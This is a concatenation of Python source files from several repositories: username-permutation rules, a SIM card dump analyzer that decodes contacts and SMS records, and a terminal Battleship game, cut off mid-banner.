def name_and_partial_surname(user_data, with_separator=''):
name = user_data[0]
surname = user_data[-1]
for prefix_length in range(1, len(surname)):
yield ''.join([name, with_separator, stringutils.prefix(surname, prefix_length)])
```
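Assuming `stringutils.prefix(s, n)` returns the first `n` characters of `s` (that helper is not shown here), the generator yields the full first name joined to every strict prefix of the surname. A self-contained sketch with a stand-in for the helper:
```python
# Hypothetical stand-in for utils.stringutils.prefix, for illustration only
def prefix(s, n):
    return s[:n]

def name_and_partial_surname(user_data, with_separator=''):
    name, surname = user_data[0], user_data[-1]
    for prefix_length in range(1, len(surname)):
        yield ''.join([name, with_separator, prefix(surname, prefix_length)])

print(list(name_and_partial_surname(['john', 'smith'], '.')))
# ['john.s', 'john.sm', 'john.smi', 'john.smit']
```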
#### File: entusergenerator/usernamerules/simple.py
```python
def simple(user_data, with_separator=''):
return [with_separator.join(user_data)]
```
#### File: entusergenerator/usernamerules/surname.py
```python
def surname(user_data, with_separator=None):
return [user_data[-1]]
``` |
{
"source": "74wny0wl/sim-analyzer",
"score": 2
} |
#### File: sim-analyzer/sim/argparsers.py
```python
import argparse
from sim.output_formats import OUTPUT_FORMAT_DEFAULT, OUTPUT_FORMAT_JSON, OUTPUT_FORMAT_CSV
def create_args_parser() -> argparse.ArgumentParser:
args_parser = argparse.ArgumentParser()
args_parser.add_argument('--root', nargs='?', default=r'.\\',
help='path to dump root (this directory should contain \'3F00\' directory)')
args_parser.add_argument('--tree', action='store_true', help='list contents of sim dump in a tree-like format')
args_parser.add_argument('--iccid', action='store_true', help='read ICCID number')
args_parser.add_argument('--contacts', action='store_true', help='read contacts')
args_parser.add_argument('--messages', action='store_true', help='read messages')
args_parser.add_argument('--output', nargs='?', default=OUTPUT_FORMAT_DEFAULT,
help='select output [{}, {}, {}]'.format(OUTPUT_FORMAT_DEFAULT, OUTPUT_FORMAT_JSON,
OUTPUT_FORMAT_CSV))
args_parser.add_argument('--version', action='version', version='%(prog)s 1.0.0')
return args_parser
```
#### File: sim-analyzer/sim/contacts.py
```python
from sim import directory
class Contact:
contact_name: str
phone_number: str
@staticmethod
def empty():
return Contact("", "")
def __init__(self, contact_name, phone_number):
self.contact_name = contact_name
self.phone_number = phone_number
def __str__(self):
return self.to_string()
def __unicode__(self):
return self.to_string()
def to_string(self):
return f'{self.contact_name}::{self.phone_number}'
class ContactNameFactory:
@staticmethod
def create_contact_name(contact_name_entry) -> str:
contact_name = contact_name_entry.replace(b'\xff', b'').decode('utf-8')
return contact_name
class PhoneNumberFactory:
@staticmethod
def create_phone_number(phone_number_entry: bytes) -> str:
phone_number = ""
if phone_number_entry[0] == 0xa1:
phone_number += '*'
phone_number_entry = phone_number_entry[1::]
if phone_number_entry[0] == 0x81:
phone_number += "+"
phone_number_entry = phone_number_entry[1::]
for phone_number_entry_part in phone_number_entry:
phone_number_element = ((phone_number_entry_part & 0x0F) << 4) | ((phone_number_entry_part & 0xF0) >> 4)
phone_number_element = "{:02x}".format(phone_number_element)
phone_number += phone_number_element
if phone_number[-1] == 'f':
phone_number = phone_number[:-1]
return phone_number
class ContactFactory:
contact_name_factory: ContactNameFactory
phone_number_factory: PhoneNumberFactory
def __init__(self, contact_name_factory, phone_number_factory):
self.contact_name_factory = contact_name_factory
self.phone_number_factory = phone_number_factory
def create_contact(self, contact_bulk_data) -> Contact:
contact_name = self.contact_name_factory.create_contact_name(contact_bulk_data[:16])
phone_number_entry_size = contact_bulk_data[16]
phone_number_entry = contact_bulk_data[17:17 + phone_number_entry_size]
phone_number = self.phone_number_factory.create_phone_number(phone_number_entry)
contact = Contact(contact_name=contact_name, phone_number=phone_number)
return contact
def dump(sim_dump_directory_path: str, contacts_file_name="6F3A"):
contacts_file_path = directory.find_file(sim_dump_directory_path, contacts_file_name)
with open(contacts_file_path, 'rb') as contacts_file:
contacts_file_content = contacts_file.read()
contact_name_factory = ContactNameFactory()
phone_number_factory = PhoneNumberFactory()
contact_factory = ContactFactory(contact_name_factory, phone_number_factory)
while contacts_file_content.count(b'\xff') != len(contacts_file_content):
contact_bulk_data = contacts_file_content[:30]
contact = contact_factory.create_contact(contact_bulk_data)
contacts_file_content = contacts_file_content[30::]
yield contact
```
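The nibble swap in `PhoneNumberFactory.create_phone_number` is the standard GSM semi-octet (reversed BCD) layout: each byte stores two digits with the low nibble first, and an odd-length number is padded with 0xF. A self-contained sketch with made-up bytes:
```python
def decode_semi_octets(data: bytes) -> str:
    digits = ""
    for b in data:
        # swap the nibbles of each byte, then render them as two hex digits
        digits += "{:02x}".format(((b & 0x0F) << 4) | ((b & 0xF0) >> 4))
    return digits.rstrip("f")  # a trailing 0xF nibble is only padding

assert decode_semi_octets(b'\x21\x43\x65') == "123456"
assert decode_semi_octets(b'\x21\x43\xf5') == "12345"
```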
#### File: sim-analyzer/sim/messages.py
```python
import binascii
import math
from datetime import datetime
from sim import directory, binary, bytes_vector
class MessagePDU:
deleted: bool
smsc_information_length: int
smsc_address_type: hex
service_center_number: str
first_octet_of_sms_deliver_msg: int
sender_number_length: int
sender_number_type: hex
sender_number: str
tp_protocol_identifier: hex
tp_data_coding_scheme: hex
tp_sc_time_stamp: datetime
user_data_length: hex
user_data: bytearray
class Message:
deleted: bool
smsc_address_type: hex
service_center_number: str
sender_number_type: hex
sender_number: str
tp_protocol_identifier: hex
tp_data_coding_scheme: hex
tp_sc_time_stamp: datetime
user_data: str
bulk_data: str
@staticmethod
def empty():
return Message(False, 0x0, "", 0x0, "", 0x0, 0x0, datetime.now(), "", "")
def __init__(self,
deleted: bool,
smsc_address_type: hex,
service_center_number: str,
sender_number_type: hex,
sender_number: str,
tp_protocol_identifier: hex,
tp_data_coding_scheme: hex,
tp_sc_time_stamp: datetime,
user_data: str,
bulk_data: str):
self.deleted = deleted
self.smsc_address_type = smsc_address_type
self.service_center_number = service_center_number
self.sender_number_type = sender_number_type
self.sender_number = sender_number
self.tp_protocol_identifier = tp_protocol_identifier
self.tp_data_coding_scheme = tp_data_coding_scheme
self.tp_sc_time_stamp = tp_sc_time_stamp
self.user_data = user_data
self.bulk_data = bulk_data
def __str__(self):
return self.to_string()
def __unicode__(self):
return self.to_string()
def to_string(self):
return self.user_data
class MessagePDUFactory:
@staticmethod
def create_message_pdu(message_bulk_data: bytes) -> MessagePDU:
MESSAGE_DELETED_OFFSET = 0
MESSAGE_SMSC_INFORMATION_LENGTH_OFFSET = 1
MESSAGE_SMSC_ADDRESS_TYPE_OFFSET = 2
MESSAGE_SERVICE_CENTER_NUMBER_OFFSET = 3
message = MessagePDU()
message.deleted = message_bulk_data[MESSAGE_DELETED_OFFSET] == 0
message.smsc_information_length = message_bulk_data[MESSAGE_SMSC_INFORMATION_LENGTH_OFFSET]
MESSAGE_FIRST_OCTET_OF_SMS_DELIVER_MSG_OFFSET \
= MESSAGE_SERVICE_CENTER_NUMBER_OFFSET + message.smsc_information_length - 1
MESSAGE_SENDER_NUMBER_LENGTH_OFFSET = MESSAGE_FIRST_OCTET_OF_SMS_DELIVER_MSG_OFFSET + 1
MESSAGE_SENDER_NUMBER_TYPE_OFFSET = MESSAGE_SENDER_NUMBER_LENGTH_OFFSET + 1
message.smsc_address_type = message_bulk_data[MESSAGE_SMSC_ADDRESS_TYPE_OFFSET]
message.service_center_number = bytes_vector.decode_vector_as_sim_string(
message_bulk_data[MESSAGE_SERVICE_CENTER_NUMBER_OFFSET:MESSAGE_FIRST_OCTET_OF_SMS_DELIVER_MSG_OFFSET])
message.first_octet_of_sms_deliver_msg = message_bulk_data[MESSAGE_FIRST_OCTET_OF_SMS_DELIVER_MSG_OFFSET]
message.sender_number_length = message_bulk_data[MESSAGE_SENDER_NUMBER_LENGTH_OFFSET]
MESSAGE_SENDER_NUMBER_LENGTH = math.ceil(message.sender_number_length / 2)
MESSAGE_SENDER_NUMBER_OFFSET = MESSAGE_SENDER_NUMBER_TYPE_OFFSET + 1
MESSAGE_TP_PROTOCOL_IDENTIFIER_OFFSET = MESSAGE_SENDER_NUMBER_OFFSET + MESSAGE_SENDER_NUMBER_LENGTH
MESSAGE_TP_DATA_CODING_SCHEME_OFFSET = MESSAGE_TP_PROTOCOL_IDENTIFIER_OFFSET + 1
MESSAGE_TP_SERVICE_CENTER_TIME_STAMP_OFFSET = MESSAGE_TP_DATA_CODING_SCHEME_OFFSET + 1
MESSAGE_TP_USER_DATA_LENGTH_OFFSET = MESSAGE_TP_SERVICE_CENTER_TIME_STAMP_OFFSET + 7
MESSAGE_USER_DATA_OFFSET = MESSAGE_TP_USER_DATA_LENGTH_OFFSET + 1
message.sender_number_type = message_bulk_data[MESSAGE_SENDER_NUMBER_TYPE_OFFSET]
message.sender_number = bytes_vector.decode_vector_as_sim_string(
message_bulk_data[MESSAGE_SENDER_NUMBER_OFFSET:MESSAGE_TP_PROTOCOL_IDENTIFIER_OFFSET])
message.tp_protocol_identifier = message_bulk_data[MESSAGE_TP_PROTOCOL_IDENTIFIER_OFFSET]
message.tp_data_coding_scheme = message_bulk_data[MESSAGE_TP_DATA_CODING_SCHEME_OFFSET]
message.tp_sc_time_stamp = bytes_vector.decode_vector_as_sim_string(
message_bulk_data[MESSAGE_TP_SERVICE_CENTER_TIME_STAMP_OFFSET: MESSAGE_TP_USER_DATA_LENGTH_OFFSET])
# TODO correct timestamp calculation
# message.tp_sc_time_stamp = datetime.strptime(message.tp_sc_time_stamp, "%y%m%d%H%M%S")
message.user_data_length = message_bulk_data[MESSAGE_TP_USER_DATA_LENGTH_OFFSET]
message.user_data = message_bulk_data[
MESSAGE_USER_DATA_OFFSET:MESSAGE_USER_DATA_OFFSET + message.user_data_length]
return message
class MessageReader:
def __init__(self):
self.SEPTET_SELECTOR_INIT = 0x7F
self.RESIDUUM_SELECTOR_INIT = 0x80
self.residuum = 0
self.septet_selector = self.SEPTET_SELECTOR_INIT
self.residuum_selector = self.RESIDUUM_SELECTOR_INIT
def reset_masks_state(self):
self.residuum = 0
self.septet_selector = self.SEPTET_SELECTOR_INIT
self.residuum_selector = self.RESIDUUM_SELECTOR_INIT
def next_masks_state(self, octet_letter):
self.residuum = (octet_letter & self.residuum_selector) >> binary.count_zeros(self.residuum_selector)
self.septet_selector = self.septet_selector >> 1
self.residuum_selector = (self.residuum_selector >> 1) + self.RESIDUUM_SELECTOR_INIT
def get_message(self, message_pdu: MessagePDU) -> str:
decoded_string = ""
self.reset_masks_state()
for octet_letter in list(filter(None, message_pdu.user_data.split(b'\xff')))[0]:
left_shifter = binary.count_zeros(self.septet_selector) - 1
septet_letter = ((octet_letter & self.septet_selector) << left_shifter) + self.residuum
decoded_string += chr(septet_letter)
self.next_masks_state(octet_letter)
if self.septet_selector == 0:
decoded_string += chr(self.residuum)
self.reset_masks_state()
return decoded_string
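# --- Illustration added for clarity (hypothetical, not part of the original module) ---
# MessageReader undoes GSM 03.38 7-bit packing: each octet supplies the low bits of one
# character and carries its remaining high bits into the next.  The classic example
# E8 32 9B FD 06 unpacks to "hello"; an equivalent self-contained decoder:
def _unpack_septets_demo(octets: bytes = bytes([0xE8, 0x32, 0x9B, 0xFD, 0x06])) -> str:
    text, carry, carry_bits = "", 0, 0
    for octet in octets:
        text += chr(((octet << carry_bits) & 0x7F) | carry)
        carry = octet >> (7 - carry_bits)
        carry_bits += 1
        if carry_bits == 7:  # seven carried bits form one extra character
            text += chr(carry)
            carry, carry_bits = 0, 0
    return text  # -> "hello"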
class MessageConverter:
__message_reader = MessageReader()
__message_pdu_factory = MessagePDUFactory()
def convert_bulk_data_to_message(self, message_bulk_data: bytes) -> Message:
message_pdu = self.__message_pdu_factory.create_message_pdu(message_bulk_data)
message = Message(
deleted=message_pdu.deleted,
smsc_address_type=message_pdu.smsc_address_type,
service_center_number=message_pdu.service_center_number,
sender_number_type=message_pdu.sender_number_type,
sender_number=message_pdu.sender_number,
tp_protocol_identifier=message_pdu.tp_protocol_identifier,
tp_data_coding_scheme=message_pdu.tp_data_coding_scheme,
tp_sc_time_stamp=message_pdu.tp_sc_time_stamp,
user_data=self.__message_reader.get_message(message_pdu),
bulk_data=binascii.hexlify(message_bulk_data).decode()
)
return message
def dump_bulk_data(sim_dump_directory_path: str, messages_file_name="6F3C"):
messages_file_path = directory.find_file(sim_dump_directory_path, messages_file_name)
with open(messages_file_path, 'rb') as messages_file:
messages_bulk_data = messages_file.read()
MESSAGE_BULK_DATA_LEN = 176
messages_count = math.floor(len(messages_bulk_data) / MESSAGE_BULK_DATA_LEN)
splitted_messages_bulk_data = [
messages_bulk_data[MESSAGE_BULK_DATA_LEN * i:MESSAGE_BULK_DATA_LEN * i + MESSAGE_BULK_DATA_LEN]
for i in range(0, messages_count)]
return splitted_messages_bulk_data
def dump_pdu(sim_dump_directory_path: str, messages_file_name="6F3C"):
message_pdu_factory = MessagePDUFactory()
for message_bulk_data in dump_bulk_data(sim_dump_directory_path, messages_file_name):
yield message_pdu_factory.create_message_pdu(message_bulk_data)
def dump(sim_dump_directory_path: str, messages_file_name="6F3C"):
message_converter = MessageConverter()
for message_bulk_data in dump_bulk_data(sim_dump_directory_path, messages_file_name):
yield message_converter.convert_bulk_data_to_message(message_bulk_data)
``` |
{
"source": "753951357159/Battleship",
"score": 4
} |
#### File: 753951357159/Battleship/Main.py
```python
from Settings import TITLE, NAME, VERSION, MDW, DEFAULT, GREEN, RED, PURPLE
from Modes.TPT import main as tpt_main
def header(mdw: int) -> None:
"""
The header of the program. Appears only once during start up. Displays the
title, name, and version of the program.
"""
print(f'{TITLE:^{mdw}}')
print(f'{NAME:^{mdw}}')
print(f'{VERSION!s:^{mdw}}', f'\n')
def menu() -> bool:
"""
The main menu of the program. The following are the valid options:
- Single Player [Arcade]
- Single Player [Realistic]
- Single Player [Competitive]
- Two Player [Traditional]
- Two Player [Arcade]
- Two Player [Realistic]
- Two Player [Competitive]
- LAN [Traditional]
- LAN [Competitive]
- Quit
    Uses the module-level MDW constant for the display width.
"""
# Display options available
window = 31 # longest option character count
print(f'{GREEN}{"Please Select An Option Below:".center(MDW)}{DEFAULT}')
print(f'{"(1) Single Player [Arcade]":<{window}}'.center(MDW))
print(f'{"(2) Single Player [Realistic]":<{window}}'.center(MDW))
print(f'{"(3) Single Player [Competitive]":<{window}}'.center(MDW))
print(f'{"(4) Two Player [Traditional]":<{window}}'.center(MDW))
print(f'{"(5) Two Player [Arcade]":<{window}}'.center(MDW))
print(f'{"(6) Two Player [Realistic]":<{window}}'.center(MDW))
print(f'{"(7) Two Player [Competitive]":<{window}}'.center(MDW))
print(f'{"(8) LAN [Traditional]":<{window}}'.center(MDW))
print(f'{"(9) LAN [Competitive]":<{window}}'.center(MDW))
print(f'{"(0) QUIT":<{window}}'.center(MDW), f'\n')
options = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']
# Ask user for valid option if applicable
response = input(f'{PURPLE} >>> {DEFAULT}')
while (response not in options) or (response == ''):
response = input(f'{PURPLE} >>> {RED}Invalid Option{DEFAULT} - '
f'Please try again: ')
if response == '1': # Starts the Single Player Arcade game mode
return False
elif response == '2': # Starts the Single Player Realistic game mode
return False
elif response == '3': # Starts the Single Player Competitive game mode
return False
elif response == '4': # Starts the Two Player Traditional game mode
tpt_main()
return False
elif response == '5': # Starts the Two Player Arcade game mode
return False
elif response == '6': # Starts the Two Player Realistic game mode
return False
elif response == '7': # Starts the Two Player Competitive game mode
return False
elif response == '8': # Starts the LAN Traditional game mode
return False
elif response == '9': # Starts the LAN Competitive game mode
return False
else: # Terminates the program
return True
if __name__ == '__main__':
exit_permission = False # Program will not exit unless True
header(MDW)
# Run program, exit when True
while not exit_permission:
exit_permission = menu()
```
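The header and menu rely on format-spec alignment (`^` to centre, `<` to left-justify) with widths taken from the `MDW` setting; a tiny stand-alone illustration with made-up values:
```python
MDW = 40                                         # hypothetical display width
print(f'{"BATTLESHIP":^{MDW}}')                  # centre the title within MDW columns
print(f'{"(1) Single Player":<31}'.center(MDW))  # pad the option to 31 columns, then centre it
```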
#### File: Battleship/Modes/General.py
```python
from typing import Tuple, List, Optional
from Settings import DEFAULT, PURPLE, RED, GREEN, BLUE, \
AFFIRMATIVE, NEGATIVE, NATIONS, \
ROW_ICON, ROW_SEP, COL_ICON, COL_SEP, COL_SPACER, CORNER, \
EMPTY_FRAME, MDW
from Objects.Mechanics.Game import BattleshipGame
from Objects.Mechanics.Player import Player
from Objects.Mechanics.Grid import Grid
# Setup ------------------------------------------------------------------------
def _setup_player() -> Tuple[Player, Player]:
"""Creates Player 1 and Player 2 basic information."""
# Helper function(s):
def _basic_info(number: int) -> Tuple[str, str]:
"""
Sets up the basic information for a player.
Parameter(s):
- number: The player number
"""
basic_check = False
while not basic_check:
name = input(
f'{PURPLE} >>> Player {number}{DEFAULT} name: ').strip()
nation = input(f'{PURPLE} >>> Player {number}{DEFAULT} '
f'nationality: ').strip().upper()
# Check if nation is valid
while (nation in nations_joined) or \
(nation not in list(NATIONS.keys())):
# Get list of valid nations
valid = list(NATIONS.keys())
for nation in nations_joined:
valid.remove(nation)
nation = input(f'{PURPLE} >>> {RED}Invalid Nation{DEFAULT} - '
f'Select from {valid}: ').strip().upper()
# Confirm with user that this is what they want
print(f'\nPLAYER {number} INFORMATION: ')
print(f'\tName: {name}')
print(f'\tNationality: {nation}')
confirm = input(
f'{PURPLE} >>> Player {number}{DEFAULT}, confirm '
f'the above is correct (Y/N): ').strip()
# Check user response is valid
while confirm not in AFFIRMATIVE and \
confirm not in NEGATIVE:
confirm = input(f'{PURPLE} >>> {RED}'
f'Invalid Option{DEFAULT} (Y/N): ')
if confirm in AFFIRMATIVE:
return name, nation
print('')
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
nations_joined = []
# Create basic Player 1 profile
p1_name, p1_nation = _basic_info(1)
p1 = Player(p1_name, p1_nation, 1)
nations_joined.append(p1_nation)
print(f'{GREEN}Welcome,{DEFAULT} {p1.name}!\n')
# Create basic Player 2 profile
p2_name, p2_nation = _basic_info(2)
p2 = Player(p2_name, p2_nation, 2)
nations_joined.append(p2_nation)
print(f'{GREEN}Welcome,{DEFAULT} {p2.name}!\n')
return p1, p2
def _setup_grid(player: Player) -> bool:
"""
Sets up the grid for the specified player.
Parameter(s):
    - player: The player the grid is currently being set up for
"""
# Helper function(s):
def _add_vessel_list() -> List[str]:
"""Creates a list of all vessel that can be added to the grid.."""
ret = [f'{BLUE}Currently In Port{DEFAULT}']
for index in range(6):
for i in range(len(player.fleet[index])):
vessel = f'[{player.fleet[index][i].abbrev} ' \
f'{player.fleet[index][i].pennant:02d}] ' \
f'{player.fleet[index][i].name}'
ret.append(vessel)
return ret
def _remove_vessel_list() -> List[str]:
"""Creates a list of all vessels removable from grid."""
ret = [f'{BLUE}Currently On Grid{DEFAULT}']
possible = [vessel.__copy__() for vessel in player.bb_curr]
possible.extend([vessel.__copy__() for vessel in player.cc_curr])
possible.extend([vessel.__copy__() for vessel in player.dd_curr])
possible.extend([vessel.__copy__() for vessel in player.ff_curr])
possible.extend([vessel.__copy__() for vessel in player.sm_curr])
possible.extend([vessel.__copy__() for vessel in player.cv_curr])
for i in range(len(possible)):
vessel = f'({possible[i].bow[0][0]}, {possible[i].bow[0][1]})' \
f' [{possible[i].abbrev} ' \
f'{possible[i].pennant:02d}] ' \
f'{possible[i].name}'
ret.append(vessel)
return ret
def _check_response(phrase: str) -> Tuple[bool, int, Optional[list]]:
"""
Checks if the response given by the user is valid.
- Must have 6 inputs or is equal to a specific command
- All inputs must match specific criteria
Valid format:
<command>, <class>, <pennant #>, <col>, <row>, <direction>
Parameter(s):
- phrase: The response being checked
"""
rem_dict = {'BB': player.bb_curr, 'CC': player.cc_curr,
'DD': player.dd_curr, 'FF': player.ff_curr,
'SM': player.sm_curr, 'CV': player.cv_curr}
add_dict = {'BB': 0, 'CC': 1, 'DD': 2, 'FF': 3, 'SM': 4, 'CV': 5}
# Check if response is the command \complete
if phrase.lower().strip() == '\\complete':
return True, -1, None
elif ',' not in phrase:
return False, 1, None # Invalid format
lst = phrase.split(',')
lst[0] = str(lst[0]).strip().lower()
# If player attempting to add vessel to grid
if len(lst) == 6:
for i in range(5):
lst[i + 1] = str(lst[i + 1]).strip().upper()
if lst[0] != '\\add':
return False, 2, None # Invalid command
elif lst[1] not in ['BB', 'CC', 'DD', 'FF', 'SM', 'CV']:
return False, 3, None # Invalid class
elif int(float(lst[2])) not in player.all_id[add_dict[lst[1]]]:
return False, 4, None # Invalid vessel
elif (lst[3] not in COL_ICON) or (lst[4] not in ROW_ICON):
return False, 5, None # Invalid coordinate
elif lst[5] not in ['N', 'S', 'E', 'W']:
return False, 6, None # Invalid direction
# Phrase is valid; check if vessel can be placed on grid
for i, vessel in enumerate(player.fleet[add_dict[lst[1]]]):
if vessel.pennant == int(lst[2]):
if not _check_placement(vessel.hp, lst[5],
(lst[3], lst[4])):
return False, 7, None # Invalid node
return True, -2, lst # Player is adding vessel
return False, 4, None # Invalid vessel
# If player attempting to remove vessel from grid
elif len(lst) == 3:
for i in range(2):
lst[i + 1] = str(lst[i + 1]).strip().upper()
if lst[0] != '\\remove':
return False, 2, None # Invalid command
elif lst[1] not in ['BB', 'CC', 'DD', 'FF', 'SM', 'CV']:
return False, 3, None # Invalid class
elif int(lst[2]) not in player.all_id[add_dict[lst[1]]]:
return False, 4, None # Invalid vessel
# Phrase is valid; check for pennant number
for i, vessel in enumerate(rem_dict[lst[1]]):
if vessel.pennant == int(lst[2]):
return True, -3, lst # player is removing vessel
return False, 4, None # Invalid vessel
else:
return False, 1, None # Invalid format
def _check_placement(hp: int, direction: str,
coordinate: Tuple[str, str]) -> bool:
"""
Checks to see if the coordinate and direction given is valid.
Parameter(s):
- hp: The hp of the vessel, equal to number of nodes to check
- direction: The direction the vessel is facing
- coordinate: The row and column
"""
col = COL_ICON.index(coordinate[0])
row = ROW_ICON.index(coordinate[1])
curr = player.personal.grid[row][col]
# Check to see if the bow node is already full or not
if curr.occupied:
return False
nodes = hp - 1
# Check all other nodes
if direction == 'N':
while nodes > 0:
if curr.south is None:
return False
elif curr.south.occupied:
return False
curr = curr.south
nodes -= 1
elif direction == 'S':
while nodes > 0:
if curr.north is None:
return False
elif curr.north.occupied:
return False
curr = curr.north
nodes -= 1
elif direction == 'E':
while nodes > 0:
if curr.west is None:
return False
elif curr.west.occupied:
return False
curr = curr.west
nodes -= 1
else:
while nodes > 0:
if curr.east is None:
return False
elif curr.east.occupied:
return False
curr = curr.east
nodes -= 1
return True
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
# Print options and base (empty) grid
vessel_lst = _add_vessel_list()
vessel_lst.append(' ')
vessel_lst.extend(_remove_vessel_list())
print(EMPTY_FRAME)
print(parallel_print([player.personal], vessel_lst))
# Ask use for input
response = input(f'{PURPLE} >>> Command{DEFAULT}: ')
check = _check_response(response)
while not check[0]:
if check[1] == 1:
response = input(f'{PURPLE} >>> {RED}Invalid Format{DEFAULT}; '
f'{PURPLE}Command{DEFAULT}: ')
elif check[1] == 2:
response = input(f'{PURPLE} >>> {RED}Invalid Command{DEFAULT}; '
f'{PURPLE}Command{DEFAULT}: ')
elif check[1] == 3:
response = input(f'{PURPLE} >>> {RED}Invalid Class{DEFAULT}; '
f'{PURPLE}Command{DEFAULT}: ')
elif check[1] == 4:
response = input(f'{PURPLE} >>> {RED}Invalid Vessel{DEFAULT}; '
f'{PURPLE}Command{DEFAULT}: ')
elif check[1] == 5:
response = input(f'{PURPLE} >>> {RED}Invalid Coordinate{DEFAULT}; '
f'{PURPLE}Command{DEFAULT}: ')
elif check[1] == 6:
response = input(f'{PURPLE} >>> {RED}Invalid Direction{DEFAULT}; '
f'{PURPLE}Command{DEFAULT}: ')
elif check[1] == 7:
response = input(f'{PURPLE} >>> {RED}Invalid Nodes{DEFAULT}; '
f'{PURPLE}Command{DEFAULT} ')
check = _check_response(response)
# Response is valid, add vessel to grid
if check[1] == -2:
player.place_vessel(check[2][1], int(check[2][2]),
(check[2][3], check[2][4]), check[2][5])
return False
# Response is valid, remove vessel from grid
elif check[1] == -3:
player.remove_vessel(check[2][1], int(check[2][2]))
return False
# Response is valid, player requesting to complete planning
else:
return True
# Confirmation -----------------------------------------------------------------
def _confirm_grid(player: Player) -> bool:
"""
Final confirmation from player for placing down vessels on grid.
Parameter(s):
- player: Player 1 / Player 2
"""
print(EMPTY_FRAME)
print(player.personal)
print(f'{BLUE}CURRENTLY DEPLOYED VESSELS{DEFAULT}')
battle_lst = [player.bb_curr, player.cc_curr, player.dd_curr,
player.ff_curr, player.sm_curr, player.cv_curr]
for lst in battle_lst:
for vessel in lst:
print(f'{BLUE}[{vessel.abbrev}] {DEFAULT}'
f'{vessel.pennant:02d} {vessel.name:35} | '
f'({vessel.bow[0][0]}, {vessel.bow[0][1]}) | '
f'{vessel.bow[1]}')
check = input(f'\n{PURPLE} >>> {player.name}{DEFAULT}, '
f'FINAL CONFIRMATION (Y/N): ')
while check not in AFFIRMATIVE and check not in NEGATIVE:
check = input(f'{PURPLE} >>> {RED}Invalid Option{DEFAULT} (Y/N): ')
if check in AFFIRMATIVE:
return True
print('')
return False
# Game modification ------------------------------------------------------------
def remove_order(game: BattleshipGame, order_num: str) -> None:
"""
Removes the specified order based on the given order number and renumbers
all the remaining orders.
Parameter(s):
- orders: The list of current orders
- order_num: The id of the order that is to be removed
"""
order = game.current_orders.pop(int(float(order_num)) - 1)
index = int(float(order_num)) - 1
for i in range(index, len(game.current_orders)):
game.current_orders[i].order_id -= 1
# Adjust grid node
coord = order.coordinate
row = ROW_ICON.index(coord[1])
col = COL_ICON.index(coord[0])
node = game.current_player.traditional.grid[row][col]
node.not_target_and_drop()
# Display ----------------------------------------------------------------------
def press_to_continue() -> None:
"""
    A simple method that prompts the user to 'press ENTER to continue',
    centered to the module-level max display width (MDW).
"""
input(f'\n{PURPLE}{"Press ENTER to Continue...":^{MDW}}{DEFAULT}')
def print_log(game: BattleshipGame) -> None:
"""
Prints the entire Activity Log for the current player in the game.
Parameter(s):
- game: The current game taking place
"""
log = game.log.full_log(game.current_player.number)
ret = ''
for i in range(len(log)):
ret += log[i] + '\n'
print(ret)
press_to_continue()
def parallel_print(grids: List[Grid], headers: List[str]) -> str:
"""
Rearranges multiple grids and other statements so it can be neatly
printed on the screen.
Parameter(s):
- grids: A list of grids that are to be printed
- headers: A list of text that also needs to be printed alongside grids
Representation Invariant(s):
- Every grid must have the same size
- The list of list of statements has maximum number of text equal to
length of the grid
"""
row = ROW_ICON[36 - grids[0].size::]
col = COL_ICON[:grids[0].size]
ret = ''
for i in range(len(row)):
for grid in grids:
temp = f'{row[i]} {ROW_SEP} '
for j in range(len(col)):
temp += f'{grid.grid[i][j].__repr__()} '
ret += f'{temp.rstrip()} '
ret = ret[:-4:]
try:
ret += f' {headers[i]}\n'
except IndexError:
ret += f'\n'
col_lines = ''
col_lines += f' {CORNER}' + f'{COL_SPACER}{COL_SEP}' * grids[0].size
ret += ((col_lines + f' ') * len(grids)).rstrip()
try:
ret += f' {headers[36]}\n'
except IndexError:
ret += f'\n'
header = ' '
for k in range(grids[0].size):
header += col[k] + ' '
ret += ((header.rstrip() + ' ') * len(grids)).rstrip()
ret.rstrip()
try:
ret += f' {headers[37]}\n'
except IndexError:
pass
return ret + '\n'
def congratulate_p1() -> None:
"""
Prints a congratulatory message for player 1 who won the game.
"""
battle_is_over = [f'██████╗ █████╗ ████████╗████████╗██╗ ███████╗ '
f'██╗███████╗ ██████╗ ██╗ ██╗███████╗██████╗ ',
f'██╔══██╗██╔══██╗╚══██╔══╝╚══██╔══╝██║ ██╔════╝ '
f'██║██╔════╝ ██╔═══██╗██║ ██║██╔════╝██╔══██╗',
f'██████╔╝███████║ ██║ ██║ ██║ █████╗ '
f'██║███████╗ ██║ ██║██║ ██║█████╗ ██████╔╝',
f'██╔══██╗██╔══██║ ██║ ██║ ██║ ██╔══╝ '
f'██║╚════██║ ██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗',
f'██████╔╝██║ ██║ ██║ ██║ ███████╗███████╗ '
f'██║███████║ ╚██████╔╝ ╚████╔╝ ███████╗██║ ██║',
f'╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚══════╝ '
f'╚═╝╚══════╝ ╚═════╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝']
victorious = [f'██████╗ ██╗ █████╗ ██╗ ██╗███████╗██████╗ ██╗ '
f' ██╗███████╗ ██╗ ██╗██╗ ██████╗████████╗ ██████╗ ██'
f'████╗ ██╗ ██████╗ ██╗ ██╗███████╗',
f'██╔══██╗██║ ██╔══██╗╚██╗ ██╔╝██╔════╝██╔══██╗ ███║ '
f' ██║██╔════╝ ██║ ██║██║██╔════╝╚══██╔══╝██╔═══██╗██'
f'╔══██╗██║██╔═══██╗██║ ██║██╔════╝',
f'██████╔╝██║ ███████║ ╚████╔╝ █████╗ ██████╔╝ ╚██║ '
f' ██║███████╗ ██║ ██║██║██║ ██║ ██║ ██║██'
f'████╔╝██║██║ ██║██║ ██║███████╗',
f'██╔═══╝ ██║ ██╔══██║ ╚██╔╝ ██╔══╝ ██╔══██╗ ██║ '
f' ██║╚════██║ ╚██╗ ██╔╝██║██║ ██║ ██║ ██║██'
f'╔══██╗██║██║ ██║██║ ██║╚════██║',
f'██║ ███████╗██║ ██║ ██║ ███████╗██║ ██║ ██║ '
f' ██║███████║ ╚████╔╝ ██║╚██████╗ ██║ ╚██████╔╝██'
f'║ ██║██║╚██████╔╝╚██████╔╝███████║',
f'╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ '
f' ╚═╝╚══════╝ ╚═══╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═'
